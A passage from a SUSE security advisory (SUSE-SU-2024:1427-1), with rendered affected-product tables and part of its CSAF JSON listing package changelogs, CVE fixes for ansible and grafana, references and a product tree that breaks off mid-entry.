Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
6.6 (Medium)
Affected products
Recommended
31 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.4 (Medium)
Affected products
Recommended
31 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
5.1 (Medium)
Affected products
Recommended
31 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch | — |
Vendor Fix
|
Threats
Impact
moderate
References
51 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security Beta update for SUSE Manager Client Tools and Salt",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update fixes the following issues:\n\nPOS_Image-Graphical7:\n\n- Update to version 0.1.1710765237.46af599\n * Move image services to dracut-saltboot package\n * Use salt bundle\n- Update to version 0.1.1645440615.7f1328c\n * Remove deprecated kiwi functions\n\nPOS_Image-JeOS7:\n\n- Update to version 0.1.1710765237.46af599\n * Move image services to dracut-saltboot package\n * Use salt bundle\n- Update to version 0.1.1645440615.7f1328c\n * Remove deprecated kiwi functions\n\nansible:\n\n- CVE-2023-5764: Address issues where internal templating can cause unsafe\n variables to lose their unsafe designation (bsc#1216854)\n * breaking_changes:\n assert - Nested templating may result in an inability for the conditional\n to be evaluated. See the porting guide for more information.\n- CVE-2024-0690: Address issue where ANSIBLE_NO_LOG was ignored (bsc#1219002)\n- CVE-2020-14365: Do a GPG validation if the disable_gpg_check option is not set. (bsc#1175993)\n- Don\u0027t Require python-coverage, it is needed only for testing (bsc#1177948)\n- CVE-2018-10874: Inventory variables are loaded from current working directory when running ad-hoc command that can\n lead to code execution (included upstream in 2.6.1) (bsc#1099805) \n\ndracut-saltboot:\n\n- Update to version 0.1.1710765237.46af599 \n * Load only first available leaseinfo (bsc#1221092)\n- Update to version 0.1.1681904360.84ef141\n\n\ngrafana:\n\n- Require Go 1.20\n- Update to version 9.5.16:\n * [SECURITY] CVE-2023-6152: Add email verification when updating\n user email (bsc#1219912)\n * [BUGFIX] Annotations: Split cleanup into separate queries and\n deletes to avoid deadlocks on MySQL\n- Update to version 9.5.15:\n * [FEATURE] Alerting: Attempt to retry retryable errors\n- Update to version 9.5.14:\n * [BUGFIX] Alerting: Fix state manager to not keep\n datasource_uid and ref_id labels in state after Error\n * [BUGFIX] Transformations: Config overrides being lost when\n config from query transform is applied\n * [BUGFIX] LDAP: Fix enable users on successfull login\n- Update to version 9.5.13:\n * [BUGFIX] BrowseDashboards: Only remember the most recent\n expanded folder\n * [BUGFIX] Licensing: Pass func to update env variables when\n starting plugin\n- Update to version 9.5.12:\n * [FEATURE] Azure: Add support for Workload Identity\n authentication\n- Update to version 9.5.9:\n * [FEATURE] SSE: Fix DSNode to not panic when response has empty\n response\n * [FEATURE] Prometheus: Handle the response with different field\n key order\n * [BUGFIX] LDAP: Fix user disabling\n\ngolang-github-prometheus-node_exporter:\n\n- Add `device_error` label for filesystem metrics.\n- Update rtnetlink library to fix errors during ARP metrics collection.\n- Update to 1.7.0 (jsc#PED-7893, jsc#PED-7928):\n * [FEATURE] Add ZFS freebsd per dataset stats #2753\n * [FEATURE] Add cpu vulnerabilities reporting from sysfs #2721\n * [ENHANCEMENT] Parallelize stat calls in Linux filesystem\n collector #1772\n * [ENHANCEMENT] Add missing linkspeeds to ethtool collector #2711\n * [ENHANCEMENT] Add CPU MHz as the value for node_cpu_info metric\n #2778\n * [ENHANCEMENT] Improve qdisc collector performance #2779\n * [ENHANCEMENT] Add include and exclude filter for hwmon\n collector #2699\n * [ENHANCEMENT] Optionally fetch ARP stats via rtnetlink instead\n of procfs #2777\n * [BUFFIX] Fix ZFS arcstats on FreeBSD 14.0+ 2754\n * [BUGFIX] Fallback to 32-bit stats in netdev #2757\n * [BUGFIX] Close btrfs.FS handle after use #2780\n * [BUGFIX] Move RO status before error return #2807\n * [BUFFIX] Fix promhttp_metric_handler_errors_total being always\n active #2808\n * [BUGFIX] Fix nfsd v4 index miss #2824\n- Update to 1.6.1:\n (no source code changes in this release)\n- BuildRequire go1.20\n- Update to 1.6.0:\n * [CHANGE] Fix cpustat when some cpus are offline #2318\n * [CHANGE] Remove metrics of offline CPUs in CPU collector #2605\n * [CHANGE] Deprecate ntp collector #2603\n * [CHANGE] Remove bcache `cache_readaheads_totals` metrics #2583\n * [CHANGE] Deprecate supervisord collector #2685\n * [FEATURE] Enable uname collector on NetBSD #2559\n * [FEATURE] NetBSD support for the meminfo collector #2570\n * [FEATURE] NetBSD support for CPU collector #2626\n * [FEATURE] Add FreeBSD collector for netisr subsystem #2668\n * [FEATURE] Add softirqs collector #2669\n * [ENHANCEMENT] Add suspended as a `node_zfs_zpool_state` #2449\n * [ENHANCEMENT] Add administrative state of Linux network\n interfaces #2515\n * [ENHANCEMENT] Log current value of GOMAXPROCS #2537\n * [ENHANCEMENT] Add profiler options for perf collector #2542\n * [ENHANCEMENT] Allow root path as metrics path #2590\n * [ENHANCEMENT] Add cpu frequency governor metrics #2569\n * [ENHANCEMENT] Add new landing page #2622\n * [ENHANCEMENT] Reduce privileges needed for btrfs device stats #2634\n * [ENHANCEMENT] Add ZFS `memory_available_bytes` #2687\n * [ENHANCEMENT] Use `SCSI_IDENT_SERIAL` as serial in diskstats #2612\n * [ENHANCEMENT] Read missing from netlink netclass attributes from sysfs #2669\n * [BUGFIX] perf: fixes for automatically detecting the correct\n tracefs mountpoints #2553\n * [BUGFIX] Fix `thermal_zone` collector noise @2554\n * [BUGFIX] Fix a problem fetching the user wire count on FreeBSD\n 2584\n * [BUGFIX] interrupts: Fix fields on linux aarch64 #2631\n * [BUGFIX] Remove metrics of offline CPUs in CPU collector #2605\n * [BUGFIX] Fix OpenBSD filesystem collector string parsing #2637\n * [BUGFIX] Fix bad reporting of `node_cpu_seconds_total` in\n OpenBSD #2663\n- Change go_modules archive in _service to use obscpio file\n\nspacecmd:\n\n- Version 5.0.5-0\n * Update translation strings\n\nspacewalk-client-tools:\n\n- Version 5.0.4-0\n * Remove rhn-profile-sync rhn_register spacewalk-channel and\n spacewalk-update-status\n\nsupportutils-plugin-susemanager-client:\n\n- Version 5.0.3-0\n * Remove rhnsd from client actions and server backend\n\nuyuni-tools:\n\n- Version 0.1.7-0\n * Fix wrong Cobbler spacewalk_authentication_endpoint property after upgrade or migration\n * Fix migration script using missing awk in migration image\n- Version 0.1.6-0\n * Pull image from authenticated registry\n * Port 80 should be published to the port 80 of the containers.\n 8080 is squid\n * Autogenerate the database password\n * Add mgrctl term command\n * Fix --version flag\n * Deny uyuni to suma upgrade and viceversa\n * Refactor upgrade to clarify script end adding post upgrade\n script (bsc#1219887)\n * Add mgradm install podman arguments to define big volumes storage\n * k8s migration use same functions as upgrade\n * Allow to use images from RPM if present\n * Schedule a system list refresh after migrate if not runned before\n * Ignore error on optional flag\n * Fix migration of multiple autoinstallable distributions\n * Obsolete uyuni-proxy-systemd-service package by mgrpxy\n * Add GitHub workflow for checking changelog\n * Allow installation using --image image:tag\n * Add command to register Peripheral server to Hub\n * Add Node exporter (9100) and Taskomatic (9800) ports to the list\n of open TCP ports\n * Fix minimal administrator password length\n * Do not assume the current host is a cluster node when getting\n kubelet version\n * Add mgrpxy start, stop and restart commands\n * Remove shm size constraints on the server\n * Add mgrpxy and mgradm status commands\n * Use uninstall commands dry run by default to avoid unintended\n removals\n * Make first user mandatory at install time\n * Add inspect and upgrade command\n * Improve error handling when exec.Command is used\n * Start/Stop/Restart command with kubernetes\n- Version 0.1.5-0\n * Install aardvark-dns if netavark is installed (bsc#1220371)\n\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2024-1427,SUSE-SLE-Manager-Tools-15-BETA-2024-1427,SUSE-SLE-Manager-Tools-Beta-For-Micro-5-2024-1427",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2024_1427-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2024:1427-1",
"url": "https://www.suse.com/support/update/announcement/2024/suse-su-20241427-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2024:1427-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2024-April/035080.html"
},
{
"category": "self",
"summary": "SUSE Bug 1008037",
"url": "https://bugzilla.suse.com/1008037"
},
{
"category": "self",
"summary": "SUSE Bug 1008038",
"url": "https://bugzilla.suse.com/1008038"
},
{
"category": "self",
"summary": "SUSE Bug 1010940",
"url": "https://bugzilla.suse.com/1010940"
},
{
"category": "self",
"summary": "SUSE Bug 1019021",
"url": "https://bugzilla.suse.com/1019021"
},
{
"category": "self",
"summary": "SUSE Bug 1038785",
"url": "https://bugzilla.suse.com/1038785"
},
{
"category": "self",
"summary": "SUSE Bug 1059235",
"url": "https://bugzilla.suse.com/1059235"
},
{
"category": "self",
"summary": "SUSE Bug 1099805",
"url": "https://bugzilla.suse.com/1099805"
},
{
"category": "self",
"summary": "SUSE Bug 1166389",
"url": "https://bugzilla.suse.com/1166389"
},
{
"category": "self",
"summary": "SUSE Bug 1171823",
"url": "https://bugzilla.suse.com/1171823"
},
{
"category": "self",
"summary": "SUSE Bug 1174145",
"url": "https://bugzilla.suse.com/1174145"
},
{
"category": "self",
"summary": "SUSE Bug 1174302",
"url": "https://bugzilla.suse.com/1174302"
},
{
"category": "self",
"summary": "SUSE Bug 1175993",
"url": "https://bugzilla.suse.com/1175993"
},
{
"category": "self",
"summary": "SUSE Bug 1177948",
"url": "https://bugzilla.suse.com/1177948"
},
{
"category": "self",
"summary": "SUSE Bug 1216854",
"url": "https://bugzilla.suse.com/1216854"
},
{
"category": "self",
"summary": "SUSE Bug 1219002",
"url": "https://bugzilla.suse.com/1219002"
},
{
"category": "self",
"summary": "SUSE Bug 1219887",
"url": "https://bugzilla.suse.com/1219887"
},
{
"category": "self",
"summary": "SUSE Bug 1219912",
"url": "https://bugzilla.suse.com/1219912"
},
{
"category": "self",
"summary": "SUSE Bug 1220371",
"url": "https://bugzilla.suse.com/1220371"
},
{
"category": "self",
"summary": "SUSE Bug 1221092",
"url": "https://bugzilla.suse.com/1221092"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-8647 page",
"url": "https://www.suse.com/security/cve/CVE-2016-8647/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2016-9587 page",
"url": "https://www.suse.com/security/cve/CVE-2016-9587/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2017-7550 page",
"url": "https://www.suse.com/security/cve/CVE-2017-7550/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2018-10874 page",
"url": "https://www.suse.com/security/cve/CVE-2018-10874/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2020-14365 page",
"url": "https://www.suse.com/security/cve/CVE-2020-14365/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-5764 page",
"url": "https://www.suse.com/security/cve/CVE-2023-5764/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-6152 page",
"url": "https://www.suse.com/security/cve/CVE-2023-6152/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-0690 page",
"url": "https://www.suse.com/security/cve/CVE-2024-0690/"
}
],
"title": "Security Beta update for SUSE Manager Client Tools and Salt",
"tracking": {
"current_release_date": "2024-04-24T09:10:16Z",
"generator": {
"date": "2024-04-24T09:10:16Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2024:1427-1",
"initial_release_date": "2024-04-24T09:10:16Z",
"revision_history": [
{
"date": "2024-04-24T09:10:16Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"product": {
"name": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"product_id": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64"
}
},
{
"category": "product_version",
"name": "grafana-9.5.16-159000.4.30.2.aarch64",
"product": {
"name": "grafana-9.5.16-159000.4.30.2.aarch64",
"product_id": "grafana-9.5.16-159000.4.30.2.aarch64"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.7-159000.3.8.1.aarch64",
"product": {
"name": "mgrctl-0.1.7-159000.3.8.1.aarch64",
"product_id": "mgrctl-0.1.7-159000.3.8.1.aarch64"
}
},
{
"category": "product_version",
"name": "uyuni-base-common-5.0.2-159000.3.21.2.aarch64",
"product": {
"name": "uyuni-base-common-5.0.2-159000.3.21.2.aarch64",
"product_id": "uyuni-base-common-5.0.2-159000.3.21.2.aarch64"
}
},
{
"category": "product_version",
"name": "uyuni-base-proxy-5.0.2-159000.3.21.2.aarch64",
"product": {
"name": "uyuni-base-proxy-5.0.2-159000.3.21.2.aarch64",
"product_id": "uyuni-base-proxy-5.0.2-159000.3.21.2.aarch64"
}
},
{
"category": "product_version",
"name": "uyuni-base-server-5.0.2-159000.3.21.2.aarch64",
"product": {
"name": "uyuni-base-server-5.0.2-159000.3.21.2.aarch64",
"product_id": "uyuni-base-server-5.0.2-159000.3.21.2.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"product": {
"name": "POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"product_id": "POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch"
}
},
{
"category": "product_version",
"name": "POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"product": {
"name": "POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"product_id": "POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch"
}
},
{
"category": "product_version",
"name": "ansible-2.9.27-159000.3.12.2.noarch",
"product": {
"name": "ansible-2.9.27-159000.3.12.2.noarch",
"product_id": "ansible-2.9.27-159000.3.12.2.noarch"
}
},
{
"category": "product_version",
"name": "ansible-doc-2.9.27-159000.3.12.2.noarch",
"product": {
"name": "ansible-doc-2.9.27-159000.3.12.2.noarch",
"product_id": "ansible-doc-2.9.27-159000.3.12.2.noarch"
}
},
{
"category": "product_version",
"name": "ansible-test-2.9.27-159000.3.12.2.noarch",
"product": {
"name": "ansible-test-2.9.27-159000.3.12.2.noarch",
"product_id": "ansible-test-2.9.27-159000.3.12.2.noarch"
}
},
{
"category": "product_version",
"name": "dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"product": {
"name": "dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
